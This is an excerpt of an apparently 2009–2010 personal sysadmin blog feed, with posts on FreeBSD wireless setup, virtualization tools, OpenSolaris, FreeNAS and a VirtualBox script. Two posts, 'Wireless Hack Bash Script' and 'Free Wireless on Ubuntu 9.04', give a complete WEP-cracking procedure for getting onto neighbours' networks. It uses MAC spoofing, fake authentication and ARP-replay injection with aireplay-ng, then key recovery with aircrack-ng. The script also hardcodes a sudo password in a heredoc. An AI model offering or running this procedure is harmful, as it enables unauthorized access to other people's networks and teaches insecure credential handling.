<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #007800;">ifconfig_wlan0</span>=<span style="color: #ff0000;">&quot;WPA DHCP&quot;</span></pre></div></div>

<p>In my case wlan0 is rum0 </p>
<p><a href="http://albertux.ayalasoft.com/es/2010/02/28/freebsd-wireless-wep-wap/">FreeBSD Wireless WEP/WAP</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/02/28/freebsd-wireless-wep-wap/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virtualization options</title>
		<link>http://albertux.ayalasoft.com/es/2010/02/28/virtualization-options/</link>
		<comments>http://albertux.ayalasoft.com/es/2010/02/28/virtualization-options/#comments</comments>
		<pubDate>Sun, 28 Feb 2010 21:42:59 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[hardware]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[virtualization]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2478</guid>
		<description><![CDATA[Virtualization Options For personal or business infrastructure: - VMware vSphere, VMware Server, VMware Player , VMware ESXi - VirtualBox, VirtualBox Web Console - Xen , Xen Live CD - Qemu - KVM - Virtual PC - Hyper-V - Citrix - Oracle VM - Parallels Others: - Bochs - Dosbox Run old DOS App or Games [...]<p><a href="http://albertux.ayalasoft.com/es/2010/02/28/virtualization-options/">Virtualization options</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Virtualization Options</strong></p>
<p>For personal or business infrastructure:</p>
<p>- <a href="http://www.vmware.com/products/vsphere/">VMware vSphere</a>, <a href="http://www.vmware.com/products/server/" target="_blank">VMware Server</a>, <a href="http://www.vmware.com/products/player/" target="_blank"> VMware Player</a> , <a href="http://www.vmware.com/products/esxi/" target="_blank">VMware ESXi</a><br />
- <a href=" http://www.virtualbox.org/" target="_blank">VirtualBox</a>, <a href="http://code.google.com/p/vboxweb/">VirtualBox Web Console</a><br />
- <a href="http://www.xen.org/" target="_blank">Xen</a> , <a href="http://wiki.xensource.com/xenwiki/LiveCD" target="_blank">Xen Live CD</a><br />
- <a href="http://www.qemu.org/" target="_blank">Qemu</a><br />
- <a href="http://www.linux-kvm.org/" target="_blank">KVM</a><br />
- <a href="http://www.microsoft.com/windows/virtual-pc/" target="_blank">Virtual PC</a><br />
- <a href="http://www.microsoft.com/windowsserver2008/en/us/hyperv-main.aspx" target="_blank">Hyper-V</a><br />
- <a href="http://www.citrix.com/" target="_blank">Citrix</a><br />
- <a href="http://www.oracle.com/us/technologies/virtualization/index.htm" target="_blank">Oracle VM</a><br />
- <a href="http://www.parallels.com/" target="_blank">Parallels</a></p>
<p>Others:<br />
- <a href="http://bochs.sourceforge.net/" target="_blank">Bochs</a><br />
- <a href="http://www.dosbox.com/" target="_blank">Dosbox</a> Run old DOS App or Games</p>
<p>Cloud computing Virtualization:</p>
<p>- <a href="http://aws.amazon.com/ec2/" target="_blank">Amazon Elastic Compute Cloud</a>, <a href="http://aws.amazon.com/vpc/" target="_blank">Amazon Virtual Private Cloud</a><br />
- <a href="http://www.elastichosts.com/" target="_blank">ElasticHosts</a></p>
<p>useful options to separate processes and information:</p>
<p>Linux use <a href="http://en.wikipedia.org/wiki/Chroot" target="_blank">Chroot</a><br />
OpenSolaris use <a href="http://docs.sun.com/app/docs/doc/819-2450" target="_blank">Zones</a><br />
FreeBSD use <a href="http://www.freebsd.org/doc/handbook/jails.html" target="_blank">Jails</a><br />
NetBSD and OpenBSD use <a href="http://sysjail.bsd.lv/" target="_blank">Sysjails</a></p>
<p>Maybe there are many other options to virtualization.</p>
<p><a href="http://albertux.ayalasoft.com/es/2010/02/28/virtualization-options/">Virtualization options</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2010/02/28/virtualization-options/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OpenSolaris 2009.06 on Toshiba Satellite u205</title>
		<link>http://albertux.ayalasoft.com/es/2009/10/31/opensolaris-2009-06-on-toshiba-satellite-u205/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/10/31/opensolaris-2009-06-on-toshiba-satellite-u205/#comments</comments>
		<pubDate>Sat, 31 Oct 2009 22:41:10 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[hardware]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[notebook]]></category>
		<category><![CDATA[opensolaris]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2298</guid>
		<description><![CDATA[OpenSolaris 2009.06 on Toshiba Satellite u205 I have a little time using Debian Squeeze on my Notebook today i decide to test OpenSolaris 2009.06 - Wireless Works Fine - Some buttons no work (browser/music/play/stop/prev/next) - To lisen mp3 files, I need to register on fluendo. - To enable Flash on Firefox only download from adobe [...]<p><a href="http://albertux.ayalasoft.com/es/2009/10/31/opensolaris-2009-06-on-toshiba-satellite-u205/">OpenSolaris 2009.06 on Toshiba Satellite u205</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>OpenSolaris 2009.06 on Toshiba Satellite u205</strong></p>
<p>I have a little time using Debian Squeeze on my Notebook today i decide to test OpenSolaris 2009.06</p>
<p>- Wireless Works Fine <img src='http://albertux.ayalasoft.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
- Some buttons no work (browser/music/play/stop/prev/next) <img src='http://albertux.ayalasoft.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /><br />
- To lisen mp3 files, I need to register on fluendo. <img src='http://albertux.ayalasoft.com/wp-includes/images/smilies/icon_neutral.gif' alt=':|' class='wp-smiley' /><br />
- To enable Flash on Firefox only download from adobe and move libflashplayer.so to /usr/lib/firefox/plugins <img src='http://albertux.ayalasoft.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Screens:</p>
<p><a href="http://ayalasoft.com/media/opensolaris0.png" rel="shadowbox[os]" ><img src="http://ayalasoft.com/media/opensolaris0.thumb.png" ></a></p>
<p><a href="http://ayalasoft.com/media/opensolaris1.png" rel="shadowbox[os]" ><img src="http://ayalasoft.com/media/opensolaris1.thumb.png" ></a></p>
<p>Now I need to read [ <a href="http://dlc.sun.com/osol/docs/content/2009.06/getstart/" target="_blank">http://dlc.sun.com/osol/docs/content/2009.06/getstart/</a> ]</p>
<p><a href="http://ayalasoft.com/media/happy_halloween.png" rel="shadowbox"><img src="http://ayalasoft.com/media/happy_halloween.thumb.png"></a><ins datetime="2009-10-31T10:39:53+00:00"></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/10/31/opensolaris-2009-06-on-toshiba-satellite-u205/">OpenSolaris 2009.06 on Toshiba Satellite u205</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/10/31/opensolaris-2009-06-on-toshiba-satellite-u205/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FreeNAS</title>
		<link>http://albertux.ayalasoft.com/es/2009/10/04/freenas/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/10/04/freenas/#comments</comments>
		<pubDate>Sun, 04 Oct 2009 16:25:57 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[bsd]]></category>
		<category><![CDATA[storage]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1523</guid>
		<description><![CDATA[FreeNAS FreeNAS is a free NAS (Network-Attached Storage) Server. www.freenas.org There are many services some are: FTP, TFTP, SSH, HTTP, SAMBA, RSYNC and more. Easy to install only need one floppy disk or cardflash memory (to save config) or small hard disk to install the system of the CD. Some services needs you have static [...]<p><a href="http://albertux.ayalasoft.com/es/2009/10/04/freenas/">FreeNAS</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>FreeNAS</strong></p>
<p>FreeNAS is a free NAS (Network-Attached Storage) Server.</p>
<p><a href="http://www.freenas.org" target="_blank">www.freenas.org</a></p>
<p><a href="http://ayalasoft.com/media/freenas.png" rel="shadowbox"><img src="http://ayalasoft.com/media/freenas-thumb.png"></a></p>
<p>There are many services some are: FTP, TFTP, SSH, HTTP, SAMBA, RSYNC and more.</p>
<p>Easy to install only need one floppy disk or cardflash memory (to save config) or small hard disk to install the system of the CD.</p>
<p>Some services needs you have static IP (not DHCP like FTP Service)</p>
<p>FreeNAS it&#8217;s a great option if you want to storage a lot of information and share that information using service (http/ftp/samba/etc.) </p>
<p>Very small and very powerfull.</p>
<p><a href="http://albertux.ayalasoft.com/es/2009/10/04/freenas/">FreeNAS</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/10/04/freenas/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Wireless Hack Bash Script</title>
		<link>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 05:59:30 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2147</guid>
		<description><![CDATA[Wireless Hack Bash Script #!/bin/bash # # WARNING: USE AT YOUR OWN RISK! # # SIDE EFFECTS: UNHAPPY NEIGHTBORS # # Author: ALbertux (Alberto Isaac Ayala Esquivias) # Mail: &#60;Albertux@AyalaSoft.com&#62; # Web: http://Albertux.AyalaSoft.com # Script: Wireless Hack # Tested on: Ubuntu 9.04 &#160; # A little trouble using gksudo gnome-terminal # https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575 # gnome-terminal -e [...]<p><a href="http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/">Wireless Hack Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Wireless Hack Bash Script</strong></p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># WARNING: USE AT YOUR OWN RISK!</span>
<span style="color: #666666; font-style: italic;">#</span>
<span style="color: #666666; font-style: italic;"># SIDE EFFECTS: UNHAPPY NEIGHTBORS</span>
<span style="color: #666666; font-style: italic;"># </span>
<span style="color: #666666; font-style: italic;"># Author: ALbertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color: #666666; font-style: italic;"># Mail: &lt;Albertux@AyalaSoft.com&gt;</span>
<span style="color: #666666; font-style: italic;"># Web: http://Albertux.AyalaSoft.com</span>
<span style="color: #666666; font-style: italic;"># Script: Wireless Hack</span>
<span style="color: #666666; font-style: italic;"># Tested on: Ubuntu 9.04</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># A little trouble using gksudo gnome-terminal</span>
<span style="color: #666666; font-style: italic;"># https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575</span>
<span style="color: #666666; font-style: italic;"># gnome-terminal -e &quot;sudo ....&quot; # could be ...</span>
<span style="color: #666666; font-style: italic;"># TERM=gnome-terminal</span>
<span style="color: #007800;">TERM</span>=xterm
&nbsp;
<span style="color: #666666; font-style: italic;"># A nasty function to run_like_a_root user sending the passwd</span>
<span style="color: #000000; font-weight: bold;">function</span> run_like_a_root<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#123;</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #660033;">-S</span> $<span style="color: #000000; font-weight: bold;">@</span> <span style="color: #cc0000; font-style: italic;">&lt;&lt; EOF
your_password
EOF</span>
<span style="color: #7a0874; font-weight: bold;">&#125;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Restore to normal: ./this_script.sh restore</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;$1&quot;</span> == <span style="color: #ff0000;">&quot;restore&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
	run_like_a_root <span style="color: #ff0000;">&quot;airmon-ng stop mon0&quot;</span>
	run_like_a_root <span style="color: #ff0000;">&quot;/etc/init.d/networking restart&quot;</span>
	run_like_a_root <span style="color: #ff0000;">&quot;NetworkManager&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">exit</span> <span style="color: #000000;">1</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Set Wireless Device: ./this_script.sh wlan1</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> $<span style="color: #000000;">1</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #007800;">WDEVICE</span>=wlan0 <span style="color: #666666; font-style: italic;"># Could be diferrent on your notebook</span>
<span style="color: #000000; font-weight: bold;">else</span>
	<span style="color: #007800;">WDEVICE</span>=$<span style="color: #000000;">1</span> <span style="color: #666666; font-style: italic;"># Set Wireless Device</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Stop Wireless</span>
run_like_a_root airmon-ng stop <span style="color: #007800;">$WDEVICE</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Kill all fu**ing process using the Wireless Device:</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">kill</span> <span style="color: #660033;">-9</span> <span style="color: #000000; font-weight: bold;">`</span>run_like_a_root airmon-ng start <span style="color: #007800;">$WDEVICE</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> ^<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">1</span>-<span style="color: #000000;">9</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">' { print $1 } '</span><span style="color: #000000; font-weight: bold;">`</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Wireless Devices Down (we need to change the Mac)</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> <span style="color: #007800;">$WDEVICE</span> down
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 down
&nbsp;
<span style="color: #666666; font-style: italic;"># Fake Mac, Example:</span>
<span style="color: #007800;">FAKEMAC</span>=00:<span style="color: #000000;">66</span>:00:<span style="color: #000000;">66</span>:00:<span style="color: #000000;">66</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Set Fake Mac</span>
run_like_a_root macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> <span style="color: #007800;">$WDEVICE</span>
run_like_a_root macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> mon0
&nbsp;
<span style="color: #666666; font-style: italic;"># Up the Wireless Interface</span>
run_like_a_root <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 up
&nbsp;
<span style="color: #666666; font-style: italic;"># See all available networks</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;airodump-ng mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Watch the xterm loaded and write the values (maybe you need resize xterm window)</span>
<span style="color: #c20cb9; font-weight: bold;">clear</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Name: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> ESSID
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Mac: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> BSSID
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Network Channel: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> CHANNEL
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Close the airodump-ng xterm and press [enter]&quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Get Data (IVs)</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;airodump-ng mon0 -w data -c <span style="color: #007800;">$CHANNEL</span> --bssid <span style="color: #007800;">$BSSID</span>&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Fake Authentication Attack</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;watch aireplay-ng -1 0 -e <span style="color: #007800;">$ESSID</span> -a <span style="color: #007800;">$BSSID</span> -h <span style="color: #007800;">$FAKEMAC</span> mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># ARP Request</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;aireplay-ng -3 -b <span style="color: #007800;">$BSSID</span> -h <span style="color: #007800;">$FAKEMAC</span> mon0&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Wait some time ...</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;Press any kay to launch aircrack-ng (30,000+ on data recommended)&quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Crack the Passwd</span>
run_like_a_root <span style="color: #007800;">$TERM</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;aircrack-ng data-*.cap&quot;</span> <span style="color: #000000; font-weight: bold;">&amp;</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">exit</span> <span style="color: #000000;">0</span></pre></div></div>

<p><a href="http://albertux.ayalasoft.com/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/">Wireless Hack Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/08/23/wireless-hack-bash-script/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Free Wireless on Ubuntu 9.04</title>
		<link>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 06:03:47 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2116</guid>
		<description><![CDATA[Free Wireless Using Ubuntu 9.04: sudo apt-get install aircrack-ng macchanger The device name could be different on your machine sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0 sudo ifconfig wlan0 down sudo ifconfig mon0 down sudo macchanger -m $FAKEMAC wlan0 sudo macchanger -m $FAKEMAC mon0 sudo ifconfig mon0 up sudo airodump-ng mon0 # See all [...]<p><a href="http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Free Wireless</strong></p>
<p>Using Ubuntu 9.04:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> aircrack-ng macchanger</pre></div></div>

<p>The device name could be different on your machine</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> airmon-ng stop wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> airmon-ng start wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> wlan0 down
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 down
<span style="color: #c20cb9; font-weight: bold;">sudo</span> macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> wlan0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> macchanger <span style="color: #660033;">-m</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> mon0 up
<span style="color: #c20cb9; font-weight: bold;">sudo</span> airodump-ng mon0 <span style="color: #666666; font-style: italic;"># See all available networks choose one channel</span></pre></div></div>

<p>Inject packets:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># terminal 01</span>
 <span style="color: #c20cb9; font-weight: bold;">sudo</span> airodump-ng mon0 <span style="color: #660033;">-w</span> wdata <span style="color: #660033;">-c</span> <span style="color: #000000;">6</span> <span style="color: #660033;">--bssid</span>  00:00:00:00:00:00 <span style="color: #666666; font-style: italic;"># -c $CHANNEL</span>
<span style="color: #666666; font-style: italic;"># terminal 02</span>
watch <span style="color: #c20cb9; font-weight: bold;">sudo</span> aireplay-ng <span style="color: #660033;">-1</span> <span style="color: #000000;">0</span> <span style="color: #660033;">-e</span> <span style="color: #007800;">$SSID</span> <span style="color: #660033;">-a</span> 00:00:00:00:00:00 <span style="color: #660033;">-h</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #666666; font-style: italic;"># terminal 03</span>
<span style="color: #c20cb9; font-weight: bold;">sudo</span> aireplay-ng <span style="color: #660033;">-3</span> <span style="color: #660033;">-b</span> 00:00:00:00:00:00 <span style="color: #660033;">-h</span> <span style="color: #007800;">$FAKEMAC</span> mon0
<span style="color: #666666; font-style: italic;"># wait some time to get 30,000 on Data on terminal 01</span></pre></div></div>

<p>Now get the password:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> aircrack-ng wdata-<span style="color: #000000; font-weight: bold;">*</span>.cap</pre></div></div>

<p>See Screens:<br />
<a href="http://www.ayalasoft.com/media/Need-wireless-01.png" rel="shadowbox[acw]"><img src="http://www.ayalasoft.com/media/Need-wireless-thumb-01.png"></a><br />
<a href="http://www.ayalasoft.com/media/Need-wireless-02.png" rel="shadowbox[acw]"><img src="http://www.ayalasoft.com/media/Need-wireless-thumb-02.png"></a></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/">Free Wireless on Ubuntu 9.04</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/08/12/free-wireless-on-ubuntu-904/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>VirtualBox Port Forward Bash Script</title>
		<link>http://albertux.ayalasoft.com/es/2009/07/17/virtualbox-port-forward-bash-script/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/07/17/virtualbox-port-forward-bash-script/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 06:32:20 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[virtualbox]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2065</guid>
		<description><![CDATA[VirtualBox Port Forward Bash Script #!/bin/bash # Albertux (Alberto Isaac Ayala Esquivias) # Email: &#60;Albertux@AyalaSoft.com&#62; # Web: http://www.AyalaSoft.com # Script: VirtualBox Port Forward Script Tool &#160; YELLOW=&#34;\033[1;33m&#34; NORMAL=&#34;\033[0m&#34; &#160; function vbox-portfwd-help &#123; echo -e &#34;\n${YELLOW}vbox-portfwd${NORMAL} [OPTIONS]\n&#34; echo -e &#34; -s \&#34;set parameters to a VirtualBox Machine\&#34;&#34; echo -e &#34; -u \&#34;unset parameters to a VirtualBox [...]<p><a href="http://albertux.ayalasoft.com/es/2009/07/17/virtualbox-port-forward-bash-script/">VirtualBox Port Forward Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p>VirtualBox Port Forward Bash Script</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;"># Albertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color: #666666; font-style: italic;"># Email: &lt;Albertux@AyalaSoft.com&gt;</span>
<span style="color: #666666; font-style: italic;"># Web: http://www.AyalaSoft.com</span>
<span style="color: #666666; font-style: italic;"># Script: VirtualBox Port Forward Script Tool</span>
&nbsp;
<span style="color: #007800;">YELLOW</span>=<span style="color: #ff0000;">&quot;\033[1;33m&quot;</span>
<span style="color: #007800;">NORMAL</span>=<span style="color: #ff0000;">&quot;\033[0m&quot;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">function</span> vbox-portfwd-help <span style="color: #7a0874; font-weight: bold;">&#123;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span><span style="color: #007800;">${YELLOW}</span>vbox-portfwd<span style="color: #007800;">${NORMAL}</span> [OPTIONS]<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -s <span style="color: #000099; font-weight: bold;">\&quot;</span>set parameters to a VirtualBox Machine<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -u <span style="color: #000099; font-weight: bold;">\&quot;</span>unset parameters to a VirtualBox Machine<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -m <span style="color: #000099; font-weight: bold;">\&quot;</span>Machine Name<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -n <span style="color: #000099; font-weight: bold;">\&quot;</span>Guest Port<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -l <span style="color: #000099; font-weight: bold;">\&quot;</span>Host Port<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  -p <span style="color: #000099; font-weight: bold;">\&quot;</span>Protocol [TCP|UDP]<span style="color: #000099; font-weight: bold;">\&quot;</span><span style="color: #000099; font-weight: bold;">\n</span><span style="color: #000099; font-weight: bold;">\n</span><span style="color: #007800;">${YELLOW}</span>Examples:<span style="color: #007800;">${NORMAL}</span>&quot;</span>
